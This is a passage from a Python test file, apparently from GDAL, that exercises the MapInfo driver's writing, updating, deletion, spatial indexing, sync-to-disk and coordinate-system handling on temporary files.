DATUM[\"Reseau_Geodesique_Francais_1993\",\n SPHEROID[\"GRS 80\",6378137,298.257222101],\n TOWGS84[0,0,0,0,0,0,0]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_2SP\"],\n PARAMETER[\"standard_parallel_1\",49.00000000001],\n PARAMETER[\"standard_parallel_2\",44],\n PARAMETER[\"latitude_of_origin\",46.5],\n PARAMETER[\"central_meridian\",3],\n PARAMETER[\"false_easting\",700000],\n PARAMETER[\"false_northing\",6600000],\n UNIT[\"Meter\",1.0],\n AUTHORITY[\"EPSG\",\"2154\"]]\"\"\"\n )\n else:\n sr.ImportFromEPSG(2154)\n if i == 4:\n lyr = ds.CreateLayer(\n \"test\", srs=sr, options=[\"BOUNDS=75000,6000000,1275000,7200000\"]\n )\n else:\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (700000.001 6600000.001)\")\n )\n lyr.CreateFeature(feat)\n ds = None\n gdal.SetConfigOption(\"MITAB_BOUNDS_FILE\", None)\n\n ds = ogr.Open(tmp_vsimem / (\"ogr_mitab_20.\" + fmt.lower()))\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n assert not (\n i == 6 and lyr.GetSpatialRef().ExportToWkt().find(\"49.00000000001\") < 0\n ), fmt\n # Strict text comparison to check precision\n if fmt == \"TAB\":\n if i == 1 or i == 2 or i == 4:\n if feat.GetGeometryRef().ExportToWkt() != \"POINT (700000.001 6600000.001)\":\n print(i)\n feat.DumpReadable()\n pytest.fail(fmt)\n else:\n if feat.GetGeometryRef().ExportToWkt() == \"POINT (700000.001 6600000.001)\":\n print(i)\n feat.DumpReadable()\n pytest.fail(fmt)\n\n ds = None\n\n\n# Test bounds file caching\n\n\n@pytest.mark.parametrize(\"reload_file\", (True, False))\ndef test_ogr_mitab_20bis(tmp_vsimem, tmp_path, reload_file):\n\n if (not reload_file) and (not sys.platform.startswith(\"linux\")):\n pytest.skip(\"Requires Linux\")\n\n bounds_fname = str(tmp_path / \"mitab_bounds.txt\")\n\n for i in range(2):\n with gdal.config_option(\"MITAB_BOUNDS_FILE\", bounds_fname):\n\n if reload_file and i == 1:\n time.sleep(1)\n\n with open(bounds_fname, \"wb\") as f:\n if i == 0:\n f.write(\n \"\"\"Source = CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000\nDestination=CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000001, 700000, 6600000 Bounds (-792421, 5278231) (3520778, 9741029)\"\"\".encode(\n \"ascii\"\n )\n )\n else:\n f.write(\n \"\"\"Source = CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000\nDestination=CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000 Bounds (75000, 6000000) (1275000, 7200000)\"\"\".encode(\n \"ascii\"\n )\n )\n\n if not reload_file:\n # Set the modification time of the bounds file to a constant\n # value. This will prevent MITABLookupCoordSysBounds from\n # loading the changed file, so the i == 0 bounds will continue\n # to be used.\n os.system(f'touch -d \"1970-01-01 00:00:01\" {bounds_fname}')\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_20.tab\"\n )\n sr = osr.SpatialReference()\n sr.ImportFromEPSG(2154)\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (700000.001 6600000.001)\")\n )\n lyr.CreateFeature(feat)\n ds = None\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_20.tab\")\n lyr = ds.GetLayer(0)\n if i == 0 or not reload_file:\n expected = \"49.00000000001\" # value from original file\n else:\n expected = \"49.00000000002\" # value from overwritten file\n assert expected in lyr.GetSpatialRef().ExportToWkt()\n\n ds = None\n\n\n###############################################################################\n# Create .tab without explicit field\n\n\ndef test_ogr_mitab_21(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_21.tab\"\n )\n lyr = ds.CreateLayer(\"test\")\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n with gdal.quiet_errors():\n lyr.CreateFeature(feat)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_21.tab\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n if feat.GetField(\"FID\") != 1:\n feat.DumpReadable()\n pytest.fail()\n ds = None\n\n\n###############################################################################\n# Test append in update mode\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_22(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_22.tab\"\n\n if nb_features == 2:\n nb_runs = 2\n else:\n nb_runs = 1\n\n # When doing 2 runs, in the second one, we create an empty\n # .tab and then open it for update. This can trigger specific bugs\n for j in range(nb_runs):\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n if j == 0:\n i = 0\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i))\n )\n if lyr.CreateFeature(feat) != 0:\n print(i)\n pytest.fail(nb_features)\n ds = None\n\n for i in range(nb_features - (1 - j)):\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1 + (1 - j))\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i + (1 - j), i + (1 - j)))\n )\n if lyr.CreateFeature(feat) != 0:\n print(i)\n pytest.fail(nb_features)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n ds = None\n\n\n###############################################################################\n# Test creating features then reading\n\n\n@pytest.mark.parametrize(\"nb_features\", (0, 1, 2, 100, 1000))\ndef test_ogr_mitab_23(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_23.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(nb_features):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n ds = None\n\n\n###############################################################################\n# Test creating features then reading then creating again then reading\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 100, 1000))\ndef test_ogr_mitab_24(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_24.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(int(nb_features / 2)):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", nb_features / 2 + i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n\n ds = None\n\n\n###############################################################################\n# Test that opening in update mode without doing any change does not alter\n# file\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_25(tmp_path, nb_features):\n\n filename = tmp_path / \"ogr_mitab_25.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i)))\n lyr.CreateFeature(feat)\n ds = None\n\n if sys.platform.startswith(\"linux\"):\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n os.system(f'touch -d \"1 minute ago\" {filename.with_suffix(ext)}')\n\n mtime_dict = {}\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime_dict[ext] = filename.with_suffix(ext).stat().st_mtime\n\n if not sys.platform.startswith(\"linux\"):\n time.sleep(1)\n\n # Try without doing anything\n ds = ogr.Open(filename, update=1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n # Try by reading all features\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.GetFeatureCount(1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n # Try by reading all features with a spatial index\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.SetSpatialFilterRect(0.5, 0.5, 1.5, 1.5)\n lyr.GetFeatureCount(1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n if test_cli_utilities.get_test_ogrsf_path() is not None:\n ret = gdaltest.runexternal(\n test_cli_utilities.get_test_ogrsf_path() + f\" -ro -fsf {filename}\"\n )\n assert ret.find(\"INFO\") != -1 and ret.find(\"ERROR\") == -1\n\n\n###############################################################################\n# Test DeleteFeature()\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_26(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_26.tab\"\n\n if nb_features == 2:\n nb_runs = 2\n else:\n nb_runs = 1\n for j in range(nb_runs):\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(nb_features):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i))\n )\n lyr.CreateFeature(feat)\n\n if nb_features == 2:\n assert lyr.DeleteFeature(int(nb_features / 2)) == 0, j\n else:\n for k in range(int(nb_features / 2)):\n assert lyr.DeleteFeature(int(nb_features / 4) + k) == 0, j\n\n if j == 1:\n # Expected failure : already deleted feature\n ret = lyr.DeleteFeature(int(nb_features / 2))\n if ret != ogr.OGRERR_NON_EXISTING_FEATURE:\n print(j)\n pytest.fail(nb_features)\n\n feat = lyr.GetFeature(int(nb_features / 2))\n if feat is not None:\n print(j)\n pytest.fail(nb_features)\n\n # Expected failure : illegal feature id\n ret = lyr.DeleteFeature(nb_features + 1)\n if ret != ogr.OGRERR_NON_EXISTING_FEATURE:\n print(j)\n pytest.fail(nb_features)\n\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == nb_features / 2\n ds = None\n\n # This used to trigger a bug in DAT record deletion during implementation...\n if nb_features == 1000:\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.DeleteFeature(245)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == nb_features / 2 - 1\n ds = None\n\n\n###############################################################################\n# Test SetFeature()\n\n\ndef test_ogr_mitab_27(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_27.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"intfield\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"realfield\", ogr.OFTReal))\n lyr.CreateField(ogr.FieldDefn(\"stringfield\", ogr.OFTString))\n\n # Invalid call : feature without FID\n f = ogr.Feature(lyr.GetLayerDefn())\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n # Invalid call : feature with FID <= 0\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(0)\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(\"intfield\", 1)\n f.SetField(\"realfield\", 2.34)\n f.SetField(\"stringfield\", \"foo\")\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (1 2)\"))\n lyr.CreateFeature(f)\n fid = f.GetFID()\n\n # Invalid call : feature with FID > feature_count\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(2)\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n # Update previously created object with blank feature\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(fid)\n lyr.SetFeature(f)\n\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetField(\"intfield\") != 0\n or f.GetField(\"realfield\") != 0\n or f.GetField(\"stringfield\") != \"\"\n or f.GetGeometryRef() is not None\n ):\n f.DumpReadable()\n pytest.fail()\n\n f.SetField(\"intfield\", 1)\n f.SetField(\"realfield\", 2.34)\n f.SetField(\"stringfield\", \"foo\")\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (2 3)\"))\n lyr.SetFeature(f)\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetField(\"intfield\") != 1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n\n lyr.DeleteFeature(f.GetFID())\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n # SetFeature() on a deleted feature\n lyr.SetFeature(f)\n\n f = lyr.GetFeature(1)\n if (\n f.GetField(\"intfield\") != 1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n # SetFeature() with identical feature : no-op\n assert lyr.SetFeature(f) == 0\n ds = None\n\n stat = gdal.VSIStatL(filename.with_suffix(\".map\"))\n old_size = stat.size\n\n # This used to trigger a bug: when using SetFeature() repeatedly, we\n # can create object blocks in the .map that are made only of deleted\n # objects.\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n for _ in range(100):\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (2 3)\"))\n assert lyr.SetFeature(f) == 0\n ds = None\n\n stat = gdal.VSIStatL(filename.with_suffix(\".map\"))\n assert stat.size == old_size\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n # SetFeature() with identical geometry : rewrite only attributes\n f.SetField(\"intfield\", -1)\n assert lyr.SetFeature(f) == 0\n\n f = lyr.GetFeature(1)\n if (\n f.GetField(\"intfield\") != -1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n\n ds = None\n\n\n###############################################################################\n\n\ndef generate_permutation(n):\n tab = [i for i in range(n)]\n for _ in range(10 * n):\n ind = random.randint(0, n - 1)\n tmp = tab[0]\n tab[0] = tab[ind]\n tab[ind] = tmp\n return tab\n\n\n###############################################################################\n# Test updating object blocks with deleted objects\n\n\ndef test_ogr_mitab_28(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_28.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n # Generate 10x10 grid\n N2 = 10\n N = N2 * N2\n for n in generate_permutation(N):\n x = int(n / N2)\n y = n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n # f.SetGeometry(ogr.CreateGeometryFromWkt('POINT(%d %d)' % (x,y)))\n f.SetGeometry(\n ogr.CreateGeometryFromWkt(\n \"LINESTRING(%d %d,%f %f,%f %f)\" % (x, y, x + 0.1, y, x + 0.2, y)\n )\n )\n lyr.CreateFeature(f)\n\n # Delete all features\n for i in range(N):\n lyr.DeleteFeature(i + 1)\n\n # Set deleted features\n i = 0\n permutation = generate_permutation(N)\n for n in permutation:\n x = int(n / N2)\n y = n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n # f.SetGeometry(ogr.CreateGeometryFromWkt('POINT(%d %d)' % (x,y)))\n f.SetGeometry(\n ogr.CreateGeometryFromWkt(\n \"LINESTRING(%d %d,%f %f,%f %f)\" % (x, y, x + 0.1, y, x + 0.2, y)\n )\n )\n f.SetFID(i + 1)\n i = i + 1\n lyr.SetFeature(f)\n\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n i = 0\n # Check sequential enumeration\n for f in lyr:\n g = f.GetGeometryRef()\n (x, y, _) = g.GetPoint(0)\n n = permutation[i]\n x_ref = int(n / N2)\n y_ref = n % N2\n assert abs(x - x_ref) + abs(y - y_ref) <= 0.1\n i = i + 1\n\n # Check spatial index integrity\n for n in range(N):\n x = int(n / N2)\n y = n % N2\n lyr.SetSpatialFilterRect(x - 0.5, y - 0.5, x + 0.5, y + 0.5)\n assert lyr.GetFeatureCount() == 1\n\n ds = None\n\n\n###############################################################################\n# Test updating a file with compressed geometries.\n\n\ndef test_ogr_mitab_29(tmp_path):\n\n gdaltest.unzip(tmp_path / \"cache\", \"data/mitab/compr_symb_deleted_records.zip\")\n if not (tmp_path / \"cache\" / \"compr_symb_deleted_records.tab\").exists():\n pytest.skip(\"Failed to extract compr_symb_deleted_records.tab\")\n\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.tab\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.dat\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.id\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.map\", tmp_path)\n\n # Is a 100x100 point grid with only the 4 edge lines left (compressed points)\n ds = ogr.Open(tmp_path / \"compr_symb_deleted_records.tab\", update=1)\n lyr = ds.GetLayer(0)\n # Re-add the 98x98 interior points\n N2 = 98\n N = N2 * N2\n permutation = generate_permutation(N)\n for n in permutation:\n x = 1 + int(n / N2)\n y = 1 + n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(%d %d)\" % (x, y)))\n lyr.CreateFeature(f)\n ds = None\n\n # Check grid integrity that after reopening\n ds = ogr.Open(tmp_path / \"compr_symb_deleted_records.tab\")\n lyr = ds.GetLayer(0)\n N2 = 100\n N = N2 * N2\n for n in range(N):\n x = int(n / N2)\n y = n % N2\n lyr.SetSpatialFilterRect(x - 0.01, y - 0.01, x + 0.01, y + 0.01)\n if lyr.GetFeatureCount() != 1:\n print(n)\n pytest.fail(x - 0.01, y - 0.01, x + 0.01, y + 0.01)\n ds = None\n\n\n###############################################################################\n# Test SyncToDisk() in create/update mode\n\n\n@pytest.mark.parametrize(\"update\", (0, 1), ids=(\"create_mode\", \"update_mode\"))\ndef test_ogr_mitab_30(tmp_path, update):\n\n filename = tmp_path / \"ogr_mitab_30.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", options=[\"BOUNDS=0,0,100,100\"])\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n assert lyr.SyncToDisk() == 0\n\n ds2 = ogr.Open(filename)\n lyr2 = ds2.GetLayer(0)\n assert lyr2.GetFeatureCount() == 0 and lyr2.GetLayerDefn().GetFieldCount() == 1\n ds2 = None\n\n # Check that the files are not updated in between\n if sys.platform.startswith(\"linux\"):\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n os.system(f'touch -d \"1 minute ago\" {filename.with_suffix(ext)}')\n\n stat = {}\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat[ext] = gdal.VSIStatL(filename.with_suffix(ext))\n\n if not sys.platform.startswith(\"linux\"):\n time.sleep(1)\n\n assert lyr.SyncToDisk() == 0\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat2 = gdal.VSIStatL(filename.with_suffix(ext))\n assert stat[ext].size == stat2.size and stat[ext].mtime == stat2.mtime\n\n if update == 1:\n ds = None\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n for j in range(100):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", j + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (j, j)))\n lyr.CreateFeature(feat)\n feat = None\n\n if not (j <= 10 or (j % 5) == 0):\n continue\n\n for i in range(2):\n ret = lyr.SyncToDisk()\n assert ret == 0\n\n if i == 0:\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat[ext] = gdal.VSIStatL(filename.with_suffix(ext))\n else:\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat2 = gdal.VSIStatL(filename.with_suffix(ext))\n if stat[ext].size != stat2.size:\n print(j)\n pytest.fail(i)\n\n ds2 = ogr.Open(filename)\n lyr2 = ds2.GetLayer(0)\n assert lyr2.GetFeatureCount() == j + 1, i\n feat2 = lyr2.GetFeature(j + 1)\n if feat2.GetField(\n \"ID\"\n ) != j + 1 or feat2.GetGeometryRef().ExportToWkt() != \"POINT (%d %d)\" % (\n j,\n j,\n ):\n print(i)\n feat2.DumpReadable()\n pytest.fail(j)\n lyr2.ResetReading()\n for _ in range(j + 1):\n feat2 = lyr2.GetNextFeature()\n if feat2.GetField(\n \"ID\"\n ) != j + 1 or feat2.GetGeometryRef().ExportToWkt() != \"POINT (%d %d)\" % (\n j,\n j,\n ):\n print(i)\n feat2.DumpReadable()\n pytest.fail(j)\n ds2 = None\n\n ds = None\n\n\n###############################################################################\n# Check read support of non-spatial .tab/.data without .map or .id (#5718)\n# We only check read-only behaviour though.\n\n\ndef test_ogr_mitab_32():\n\n for update in (0, 1):\n ds = ogr.Open(\"data/mitab/aspatial-table.tab\", update=update)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 2, update\n f = lyr.GetNextFeature()\n assert (\n f.GetField(\"a\") == 1 and f.GetField(\"b\") == 2 and f.GetField(\"d\") == \"hello\"\n ), update\n f = lyr.GetFeature(2)\n assert f.GetField(\"a\") == 4, update\n ds = None\n\n\n###############################################################################\n# Test opening and modifying a file created with MapInfo that consists of\n# a single object block, without index block\n\n\ndef test_ogr_mitab_33(tmp_path):\n\n for update in (0, 1):\n ds = ogr.Open(\"data/mitab/single_point_mapinfo.tab\", update=update)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 1, update\n f = lyr.GetNextFeature()\n assert f.GetField(\"toto\") == \"\", update\n ds = None\n\n # Test adding a new object\n shutil.copy(\"data/mitab/single_point_mapinfo.tab\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.dat\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.id\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.map\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1363180 7509810)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 2\n f = lyr.GetNextFeature()\n assert f is not None\n f = lyr.GetNextFeature()\n assert f is not None\n ds = None\n\n # Test replacing the existing object\n shutil.copy(\"data/mitab/single_point_mapinfo.tab\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.dat\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.id\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.map\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(1)\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1363180 7509810)\"))\n lyr.SetFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 1\n f = lyr.GetNextFeature()\n assert f is not None\n ds = None\n\n\n###############################################################################\n# Test updating a line that spans over several coordinate blocks\n\n\ndef test_ogr_mitab_34(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_34.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"ogr_mitab_34\", options=[\"BOUNDS=-1000,0,1000,3000\"])\n lyr.CreateField(ogr.FieldDefn(\"dummy\", ogr.OFTString))\n geom = ogr.Geometry(ogr.wkbLineString)\n for i in range(1000):\n geom.AddPoint_2D(i, i)\n for _ in range(2):\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(geom)\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n lyr.GetNextFeature() # seek to another object\n geom = f.GetGeometryRef()\n geom.SetPoint_2D(0, -1000, 3000)\n lyr.SetFeature(f)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n geom = f.GetGeometryRef()\n assert geom.GetX(0) == pytest.approx(-1000, abs=1e-2) and geom.GetY(\n 0\n ) == pytest.approx(3000, abs=1e-2)\n for i in range(999):\n assert geom.GetX(i + 1) == pytest.approx((i + 1), abs=1e-2) and geom.GetY(\n i + 1\n ) == pytest.approx((i + 1), abs=1e-2)\n f = lyr.GetNextFeature()\n geom = f.GetGeometryRef()\n for i in range(1000):\n assert geom.GetX(i) == pytest.approx((i), abs=1e-2) and geom.GetY(\n i\n ) == pytest.approx((i), abs=1e-2)\n ds = None\n\n\n###############################################################################\n# Test SRS support\n\n\ndef get_srs_from_coordsys(workdir, coordsys):\n mif_filename = workdir / \"foo.mif\"\n f = gdal.VSIFOpenL(mif_filename, \"wb\")\n content = (\n \"\"\"Version 300\nCharset \"Neutral\"\nDelimiter \",\"\n%s\nColumns 1\n foo Char(254)\nData\n\nNONE\n\"\"\"\n % coordsys\n )\n content = content.encode(\"ascii\")\n gdal.VSIFWriteL(content, 1, len(content), f)\n gdal.VSIFCloseL(f)\n\n f = gdal.VSIFOpenL(mif_filename.with_suffix(\".mid\"), \"wb\")\n content = '\"\"\\n'\n content = content.encode(\"ascii\")\n gdal.VSIFWriteL(content, 1, len(content), f)\n gdal.VSIFCloseL(f)\n\n ds = ogr.Open(mif_filename)\n srs = ds.GetLayer(0).GetSpatialRef()\n if srs is not None:\n srs = srs.Clone()\n\n gdal.Unlink(mif_filename)\n gdal.Unlink(mif_filename.with_suffix(\".mid\"))\n\n return srs\n\n\ndef get_coordsys_from_srs(workdir, srs):\n mif_filename = workdir / \"foo.mif\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(mif_filename)\n lyr = 